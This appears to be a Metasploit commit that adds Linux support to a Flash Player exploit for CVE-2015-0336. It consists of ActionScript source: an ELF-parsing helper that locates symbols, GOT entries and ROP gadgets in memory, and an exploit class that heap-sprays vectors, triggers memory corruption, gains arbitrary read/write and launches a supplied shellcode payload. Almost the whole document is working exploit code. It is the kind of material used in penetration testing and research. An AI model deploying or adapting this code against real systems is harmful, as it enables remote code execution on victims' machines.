Land rapid7#5425, Add Linux support to CVE-2015-0336

Author: wchen-r7

data/exploits/CVE-2015-0336/msf.swf

@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}

data/exploits/CVE-2015-0336/trigger_linux.swf

@@ -0,0 +1,120 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 5. Build with: mxmlc -o msf.swf Exploit.as
+
+// It uses some original code from @hdarwin89 for exploitation using ba's and vectors
+
+package
+{
+    import flash.display.Sprite
+    import flash.display.LoaderInfo
+    import flash.display.Loader
+    import flash.utils.ByteArray
+    import flash.utils.Endian
+    import flash.utils.* 
+    import flash.external.ExternalInterface
+    import mx.utils.Base64Decoder
+    
+
+    public class Exploit extends Sprite 
+    {
+        private var uv:Vector.<uint> = new Vector.<uint>
+        private var exploiter:Exploiter
+        
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+        private var interval_id:uint
+        private var trigger_swf:String 
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:String
+        private var platform:String
+
+        public function Exploit() 
+        {
+            var i:uint = 0
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray().toString()
+            
+            if (platform == 'win') { 
+                for (i = 0; i < 89698; i = i + 1) {
+                    spray[i] = new Vector.<uint>(1014)
+                    spray[i][0] = 0xdeadbeef
+                    spray[i][1] = 0xdeedbeef
+                    spray[i][2] = i
+                    spray[i][29] = 0x1a1e1429
+                }
+
+                for(i = 0; i < 89698; i = i + 1) {
+                    spray[i].length = 0x1e
+                }
+            } else if (platform == 'linux') { 
+                for (i = 0; i < 89698; i = i + 1) {
+                    spray[i] = new Vector.<uint>(1022)
+                    spray[i][0] = 0xdeadbeef
+                    spray[i][1] = 0xdeedbeef
+                    spray[i][2] = i
+                    spray[i][29] = 0x956c1490   // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021
+                    spray[i][39] = 1            // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58
+                    spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted)
+                }
+            }
+    
+            var trigger_byte_array:ByteArray = createByteArray(trigger_swf)
+            trigger_byte_array.endian = Endian.LITTLE_ENDIAN
+            trigger_byte_array.position = 0
+            // Trigger corruption
+            var trigger_loader:Loader = new Loader()
+            trigger_loader.loadBytes(trigger_byte_array)
+
+            interval_id = setTimeout(do_exploit, 2000)
+        }
+
+
+        private function createByteArray(hex_string:String) : ByteArray {
+            var byte:String
+            var byte_array:ByteArray = new ByteArray()
+            var hex_string_length:uint = hex_string.length
+            var i:uint = 0
+            while(i < hex_string_length)
+            {
+                byte = hex_string.charAt(i) + hex_string.charAt(i + 1)
+                byte_array.writeByte(parseInt(byte,16))
+                i = i + 2
+            }
+            return byte_array
+        }
+
+        private function do_exploit():void {
+            clearTimeout(interval_id)
+
+            for(var i:uint = 0; i < spray.length; i = i + 1) {
+                if (spray[i].length != 1022 && spray[i].length != 0x1e) {
+                    Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
+                    spray[i][0x3ffffffe] = 0xffffffff
+                    spray[i][0x3fffffff] = spray[i][1023]
+                    uv = spray[i]
+                }
+            }
+
+            for(i = 0; i < spray.length; i = i + 1) {
+                if (spray[i].length == 1022 || spray[i].length == 0x1e) {
+                    spray[i] = null
+                }
+            }
+
+            if (uv == null || uv.length != 0xffffffff) {
+                return
+            }
+
+            exploiter = new Exploiter(this, platform, payload, uv)
+        }
+    }
+}
+